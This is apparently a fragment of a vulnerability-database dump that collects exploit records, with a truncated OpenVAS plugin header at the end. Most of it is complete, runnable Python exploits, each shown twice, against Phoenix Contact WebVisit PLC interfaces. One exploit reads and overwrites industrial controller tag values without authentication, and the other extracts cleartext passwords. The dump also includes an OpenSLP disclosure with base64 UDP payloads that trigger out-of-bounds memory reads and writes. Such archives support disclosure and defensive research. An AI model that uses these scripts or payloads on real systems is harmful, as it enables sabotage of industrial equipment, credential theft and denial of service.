CVE-2016-8380, CVE-2016-8371 \n \n# Description \n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection) \n# Steps: \n# * Get Project Name: http://<ip>/ \n# * Get list of tags: http://<ip>/<projectname>.tcr \n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe \n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!) \n \n# CVE-2016-8380-SetPLCValues.py \n \n#! /usr/bin/env python \n \nimport urllib2 \n \nstrIP = raw_input('Please enter an IP [192.168.1.200]: ') \nif strIP == '': strIP = '192.168.1.200' \n \ntry: \nURLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': no response') \nraw_input('Press Enter to exit') \nexit() \n \nstrProject = '' \nfor line in URLResponse.readlines(): \nif 'ProjectName' in line: \nstrProject = line.split('VALUE=\"')[1].split('\"')[0] \n \nif strProject == '': \nprint('#### Error, no \\'ProjectName\\' found on the main page') \nraw_input('Press Enter to exit') \nexit() \n \nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags') \n \ntry: \nTagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found') \nraw_input('Press Enter to exit') \nexit() \n \narrTagList = [] \nfor line in TagResponse.readlines(): \nif line.startswith('#!-- N ='): \nintNumberOfTags = int(line.split('=')[1]) \nprint('---- There should be ' + str(intNumberOfTags) + ' tags:') \nif not line.startswith('#'): \nif not line.split(';')[0].strip() == '': \narrTagList.append(line.split(';')[0].strip()) \nprint('-- '+line.split(';')[0].strip()) \n \n \nraw_input('Press Enter to query them all') \nimport os, urllib \nos.system('cls' if os.name == 'nt' else 'clear') \nstrPost = '<body>' \nstrPost += '<item_list_size>' + 
str(len(arrTagList)) + '</item_list_size>' \nstrPost += '<item_list>' \nfor item in arrTagList: \nstrPost += '<i><n>' + item + '</n></i>' \nstrPost += '</item_list></body>' \nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read() \n \narrData = [] \nfor item in DataResponse.split('<i>'): \nif '<n>' in item: \nname = item.split('<n>')[1].split('</n>')[0] \nvalue = item.split('<v>')[1].split('</v>')[0] \narrData.append((name,value)) \nprint('----- Full list of tags and their values:') \ni = 0 \nfor item in arrData: \ni += 1 \nprint(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1]) \n \nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ') \nif ans1 == '': \nexit() \nstrTag = arrData[int(ans1) - 1][0] \nstrVal = arrData[int(ans1) - 1][1] \nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ') \nif ans2 == '': ans2 = strVal \nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' 
+ urllib.quote_plus(strTag) + '+' + str(ans2))) \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149776/phoenixcwv-bypass.txt"}, {"lastseen": "2018-10-12T02:15:26", "bulletinFamily": "exploit", "description": "", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "PACKETSTORM:149763", "href": "https://packetstormsecurity.com/files/149763/Phoenix-Contact-WebVisit-6.40.00-Password-Disclosure.html", "title": "Phoenix Contact WebVisit 6.40.00 Password Disclosure", "type": "packetstorm", "sourceData": "`# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure \n# Exploit Author: Deneut Tijl \n# Date: 2018-09-30 \n# Vendor Homepage: www.phoenixcontact.com \n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5 \n# Version: WebVisit < 6.40.00 \n# CVE: CVE-2016-8366 \n \n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \n# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved \n \n# Sample output: \n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py \n# Please enter an IP [192.168.1.200]: \n# This is the password for userlevel 1: pw1 \n# This is the password for userlevel 2: SuperPass2 \n# This is the password for userlevel 3: Extreme2TheMax3 \n# This is the password for userlevel 4: PowerPass4 \n# Press Enter to exit \n \n# PoC \n \n#! 
/usr/bin/env python \n \nimport urllib2, binascii \n \nstrIP = raw_input('Please enter an IP [192.168.1.200]: ') \nif strIP == '': strIP = '192.168.1.200' \n \ntry: \nURLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': no response') \nraw_input('Press Enter to exit') \nexit() \n \nstrMainTEQ = '' \nfor line in URLResponse.readlines(): \nif 'MainTEQName' in line: \nstrMainTEQ = line.split('VALUE=\"')[1].split('\"')[0] \n \nif strMainTEQ == '': \nprint('#### Error, no \\'MainTEQ\\' found on the main page') \nraw_input('Press Enter to exit') \nexit() \n \ntry: \nLoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ)) \nexcept urllib2.HTTPError: \nprint('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found') \nraw_input('Press Enter to exit') \nexit() \nstrAlldata = '' \nfor line in LoginTeqResponse.readlines(): \nstrAlldata += binascii.hexlify(line) \n \n## For vulnerable webvisit: \n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password' \n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password' \n## For WebVisit > 6.40.00 \n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes) \n \narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001' \nfor item in arrData: \nif '00030003010301068300' in item: \nintUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1 \nstrPassLength = item.split('00030003010301068300')[1][:2] \nstrPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))]) \nprint('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword) \nelif '0003000301030b06830040' in item: \nintUserlevel = int(binascii.unhexlify(item[:2]), 16) \nstrHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2]) \nprint('This is the hash for 
userlevel ' + str(intUserlevel) + ': ' + strHash.lower()) \nraw_input('Press Enter to exit') \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149763/phoenixcontactwebvisit64000-disclose.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:27", "bulletinFamily": "exploit", "description": "", "modified": "2018-11-07T00:00:00", "published": "2018-11-07T00:00:00", "id": "EDB-ID:45804", "href": "https://www.exploit-db.com/exploits/45804", "type": "exploitdb", "title": "OpenSLP 2.0.0 - Multiple Vulnerabilities", "sourceData": "\r\n _ _ \r\n / | ___ ___ ___ ___ ___| |___ \r\n _ / / | . | . | -_| |_ -| | . |\r\n|_|_/ |___| _|___|_|_|___|_| _|\r\n |_| |_| \r\n\r\n2018-11-07\r\n\r\nMORE BUGS IN OPENSLP-2.0.0\r\n==========================\r\n\r\nI discovered some bugs in openslp-2.0.0 back in January, 2018. \r\nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free),\r\nand today I'm disclosing two more.\r\n\r\n\r\nBUG 1\r\n=====\r\n\r\nThis issue is an OOB read that does not crash the application.\r\nSo in terms of exploitation it is not very interesting. If that's what\r\nyou're here for then scroll down to bug#2.\r\nAfter the occurence of the bug the application actually detects the error\r\nand ignores the malicious packet. Therefore, it could be argued that this\r\nis not a bug at all. 
Nevertheless, here it is:\r\n\r\nProof of concept exploit:\r\n\r\n echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427\r\n\r\nValgrind report:\r\n\r\n ==27968== Invalid read of size 1\r\n ==27968== at 0x412436: GetUINT16 (slp_message.c:63)\r\n ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)\r\n ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)\r\n ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd\r\n ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)\r\n ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)\r\n ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n\r\nAnalysis:\r\n\r\nv2ParseSrvReg is responsible for parsing incoming requests. Various bytes\r\nare read from the packet and interpreted as integers used as length fields.\r\nOne of them is the scopelistlen, parsed on line 321, and further used as\r\nargument for the amount of bytes to increment the buffer->curpos pointer\r\nin the the GetStrPtr function, shown below on line 112. It now points to\r\nuninitialized memory.\r\n\r\nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \r\npointer is dereferenced.\r\n\r\nSubsequently the comparison on line 329 evaluates to true since the\r\nbuffer->curpos now points to memory located after the buffer->end\r\npointer. 
The application therefore stops processing the malicious packet.\r\n\r\n 291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg)\r\n 292 {\r\n 293 int result;\r\n 294\r\n 295 /* 0 1 2 3\r\n 296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\r\n 297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 298 | <URL-Entry> \\\r\n 299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 300 | length of service type string | <service-type> \\\r\n 301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 302 | length of <scope-list> | <scope-list> \\\r\n 303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 304 | length of attr-list string | <attr-list> \\\r\n 305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\\r\n 307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */\r\n 308\r\n 309 /* Parse the <URL-Entry>. */\r\n 310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry);\r\n 311 if (result != 0)\r\n 312 return result;\r\n 313\r\n 314 /* Parse the <service-type> string. */\r\n 315 srvreg->srvtypelen = GetUINT16(&buffer->curpos);\r\n 316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen);\r\n 317 if (buffer->curpos > buffer->end)\r\n 318 return SLP_ERROR_PARSE_ERROR;\r\n 319\r\n 320 /* Parse the <scope-list> string. */\r\n 321 srvreg->scopelistlen = GetUINT16(&buffer->curpos);\r\n 322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen);\r\n 323 if (buffer->curpos > buffer->end)\r\n 324 return SLP_ERROR_PARSE_ERROR;\r\n 325\r\n 326 /* Parse the <attr-list> string. 
*/\r\n 327 srvreg->attrlistlen = GetUINT16(&buffer->curpos);\r\n 328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen);\r\n 329 if (buffer->curpos > buffer->end)\r\n 330 return SLP_ERROR_PARSE_ERROR;\r\n \r\n 54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word.\r\n 55 *\r\n 56 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 57 *\r\n 58 * @return A 16-bit unsigned value in native format; the buffer pointer\r\n 59 * is moved ahead by 2 bytes on return.\r\n 60 */\r\n 61 uint16_t GetUINT16(uint8_t ** cpp)\r\n 62 {\r\n 63 uint16_t rv = AS_UINT16(*cpp);\r\n 64 *cpp += 2;\r\n 65 return rv;\r\n 66 }\r\n ...\r\n 96 /** Extract a string buffer address into a character pointer.\r\n 97 *\r\n 98 * Note that this routine doesn't actually copy the string. It only casts\r\n 99 * the buffer pointer to a character pointer and moves the value at @p cpp\r\n 100 * ahead by @p len bytes.\r\n 101 *\r\n 102 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 103 * @param[in] len - The length of the string to extract.\r\n 104 *\r\n 105 * @return A pointer to the first character at the address pointed to by\r\n 106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes\r\n 107 * on return.\r\n 108 */\r\n 109 char * GetStrPtr(uint8_t ** cpp, size_t len)\r\n 110 {\r\n 111 char * sp = (char *)*cpp;\r\n 112 *cpp += len;\r\n 113 return sp;\r\n 114 }\r\n\r\n\r\nProof of discovery: \r\n\r\n $ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum\r\n 0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 -\r\n\r\ntwitter.com/magnusstubman/status/953909628622069760\r\n\r\n\r\nPatch:\r\n\r\nI'm not aware of any patch, and I'm not sure the maintainers are going to patch it.\r\n\r\nBUG 2\r\n=====\r\n\r\nFirst and foremost, I'm not claiming credit for this bug since it was\r\napparently discovered by Reno Robert and publicly disclosed on the\r\noss-security 
mailing list on 2016-09-27 and awarded CVE-2016-7567\r\nthe day after.\r\n\r\nopenwall.com/lists/oss-security/2016/09/27/4\r\nopenwall.com/lists/oss-security/2016/09/28/1\r\n\r\nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I\r\nreported it to the maintainers who made me aware of the earlier discovery.\r\nWhat puzzled me was that no announcement had been made and the fact that\r\nthe latest stable version on their website is still vulnerable! I found it\r\n2017-12-06 and reported it 2018-01-18. See further down for proof of\r\ndiscovery.\r\n\r\nI havn't been able to find any exploit for this bug anywhere. Therefore,\r\nI'm today disclosing a proof-of-concept exploit for the bug to increase\r\nattention on the issue.\r\n\r\nExploit:\r\n\r\n echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427\r\n\r\nValgrind report:\r\n\r\n ==56913== Invalid write of size 1\r\n ==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914)\r\n ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210)\r\n ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd\r\n ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==56913== by 0x415C51: 
_xmemdup (slp_xmalloc.c:356)\r\n ==56913== by 0x410096: SLPCompareString (slp_compare.c:365)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n\r\nThe while loop on line 207 fails to perform bounds checking, and as such\r\nmay end up incrementing the pointer p up to a point such that p is bigger\r\nthan ep. Thus, the third argument to memmove on line 2010 becomes negative.\r\nHowever, since memmove accepts a size_t (which is unsigned) the value wraps\r\naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove\r\nattempting to move an excessive amount of memory, resulting in OOB write.\r\n\r\n 184 /** fold internal white space within a string.\r\n 185 *\r\n 186 * folds all internal white space to a single space character within a\r\n 187 * specified string. modified the @p str parameter with the result and\r\n 188 * returns the new length of the string.\r\n 189 *\r\n 190 * @param[in] len - the length in bytes of @p str.\r\n 191 * @param[in,out] str - the string from which extraneous white space\r\n 192 * should be removed.\r\n 193 *\r\n 194 * @return the new (shorter) length of @p str.\r\n 195 *\r\n 196 * @note this routine assumes that leading and trailing white space have\r\n 197 * already been removed from @p str.\r\n 198 */\r\n 199 static int slpfoldwhitespace(size_t len, char * str)\r\n 200 {\r\n 201 char * p = str, * ep = str + len;\r\n 202 while (p < ep)\r\n 203 {\r\n 204 if (isspace(*p))\r\n 205 {\r\n 206 char * ws2p = ++p; /* point ws2p to the second ws char. */\r\n 207 while (isspace(*p)) /* scan till we hit a non-ws char. 
*/\r\n 208 p++;\r\n 209 len -= p - ws2p; /* reduce the length by extra ws. */\r\n 210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */\r\n 211 }\r\n 212 p++;\r\n 213 }\r\n 214 return (int)len;\r\n 215 }\r\n\r\nProof of discovery:\r\n\r\n $ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum\r\n 5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 -\r\n\r\ntwitter.com/magnusstubman/status/938317849474555904\r\n\r\nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \r\n\r\nREFERENCES\r\n==========\r\n\r\n- sourceforge.net/p/openslp/bugs/161\r\n- sourceforge.net/p/openslp/bugs/160\r\n- twitter.com/magnusstubman/status/938317849474555904\r\n- twitter.com/magnusstubman/status/953909628622069760\r\n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a\r\n- openwall.com/lists/oss-security/2016/09/27/4\r\n- openwall.com/lists/oss-security/2016/09/28/1", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45804"}, {"lastseen": "2018-10-12T14:30:07", "bulletinFamily": "exploit", "description": "Phoenix Contact WebVisit 2985725 - Authentication Bypass. CVE-2016-8371,CVE-2016-8380. 
Webapps exploit for Windows platform", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "EDB-ID:45590", "href": "https://www.exploit-db.com/exploits/45590/", "type": "exploitdb", "title": "Phoenix Contact WebVisit 2985725 - Authentication Bypass", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass\r\n# Date: 2018-09-30\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit (all versions)\r\n# CVE : CVE-2016-8380, CVE-2016-8371\r\n\r\n# Description\r\n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)\r\n# Steps:\r\n# * Get Project Name: http://<ip>/\r\n# * Get list of tags: http://<ip>/<projectname>.tcr\r\n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe\r\n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)\r\n\r\n# CVE-2016-8380-SetPLCValues.py\r\n\r\n#! 
/usr/bin/env python\r\n\r\nimport urllib2\r\n\r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n\r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nstrProject = ''\r\nfor line in URLResponse.readlines():\r\n if 'ProjectName' in line:\r\n strProject = line.split('VALUE=\"')[1].split('\"')[0]\r\n\r\nif strProject == '':\r\n print('#### Error, no \\'ProjectName\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags')\r\n\r\ntry:\r\n TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\narrTagList = []\r\nfor line in TagResponse.readlines():\r\n if line.startswith('#!-- N ='):\r\n intNumberOfTags = int(line.split('=')[1])\r\n print('---- There should be ' + str(intNumberOfTags) + ' tags:')\r\n if not line.startswith('#'):\r\n if not line.split(';')[0].strip() == '':\r\n arrTagList.append(line.split(';')[0].strip())\r\n print('-- '+line.split(';')[0].strip())\r\n\r\n\r\nraw_input('Press Enter to query them all')\r\nimport os, urllib\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\nstrPost = '<body>'\r\nstrPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'\r\nstrPost += '<item_list>'\r\nfor item in arrTagList:\r\n strPost += '<i><n>' + item + '</n></i>'\r\nstrPost += '</item_list></body>'\r\nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()\r\n\r\narrData = []\r\nfor item in DataResponse.split('<i>'):\r\n if '<n>' in item:\r\n name 
= item.split('<n>')[1].split('</n>')[0]\r\n value = item.split('<v>')[1].split('</v>')[0]\r\n arrData.append((name,value))\r\nprint('----- Full list of tags and their values:')\r\ni = 0\r\nfor item in arrData:\r\n i += 1\r\n print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])\r\n\r\nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')\r\nif ans1 == '':\r\n exit()\r\nstrTag = arrData[int(ans1) - 1][0]\r\nstrVal = arrData[int(ans1) - 1][1]\r\nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')\r\nif ans2 == '': ans2 = strVal\r\nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45590/"}, {"lastseen": "2018-10-11T16:29:59", "bulletinFamily": "exploit", "description": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure. CVE-2016-8366. 
Webapps exploit for Hardware platform", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "EDB-ID:45586", "href": "https://www.exploit-db.com/exploits/45586/", "type": "exploitdb", "title": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure\r\n# Exploit Author: Deneut Tijl\r\n# Date: 2018-09-30\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit < 6.40.00\r\n# CVE: CVE-2016-8366\r\n\r\n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \r\n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \r\n# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved\r\n\t\t\r\n# Sample output:\r\n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py\r\n# Please enter an IP [192.168.1.200]:\r\n# This is the password for userlevel 1: pw1\r\n# This is the password for userlevel 2: SuperPass2\r\n# This is the password for userlevel 3: Extreme2TheMax3\r\n# This is the password for userlevel 4: PowerPass4\r\n# Press Enter to exit\r\n\r\n# PoC\r\n\r\n#! 
/usr/bin/env python\r\n\r\nimport urllib2, binascii\r\n\r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n\r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nstrMainTEQ = ''\r\nfor line in URLResponse.readlines():\r\n if 'MainTEQName' in line:\r\n strMainTEQ = line.split('VALUE=\"')[1].split('\"')[0]\r\n\r\nif strMainTEQ == '':\r\n print('#### Error, no \\'MainTEQ\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\ntry:\r\n LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))\r\nexcept urllib2.HTTPError:\r\n print('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\nstrAlldata = ''\r\nfor line in LoginTeqResponse.readlines():\r\n strAlldata += binascii.hexlify(line)\r\n\r\n## For vulnerable webvisit:\r\n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'\r\n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'\r\n## For WebVisit > 6.40.00\r\n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)\r\n\r\narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'\r\nfor item in arrData:\r\n if '00030003010301068300' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1\r\n strPassLength = item.split('00030003010301068300')[1][:2]\r\n strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])\r\n print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)\r\n elif '0003000301030b06830040' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16)\r\n strHash = 
binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])\r\n print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())\r\nraw_input('Press Enter to exit')", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/45586/"}], "openvas": [{"lastseen": "2019-05-29T18:33:13", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4457129", "modified": "2019-05-03T00:00:00", "published": "2018-09-12T00:00:00", "id": "OPENVAS:1361412562310814003", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814003", "title": "Microsoft Windows Multiple Vulnerabilities (KB4457129)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4457129)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but 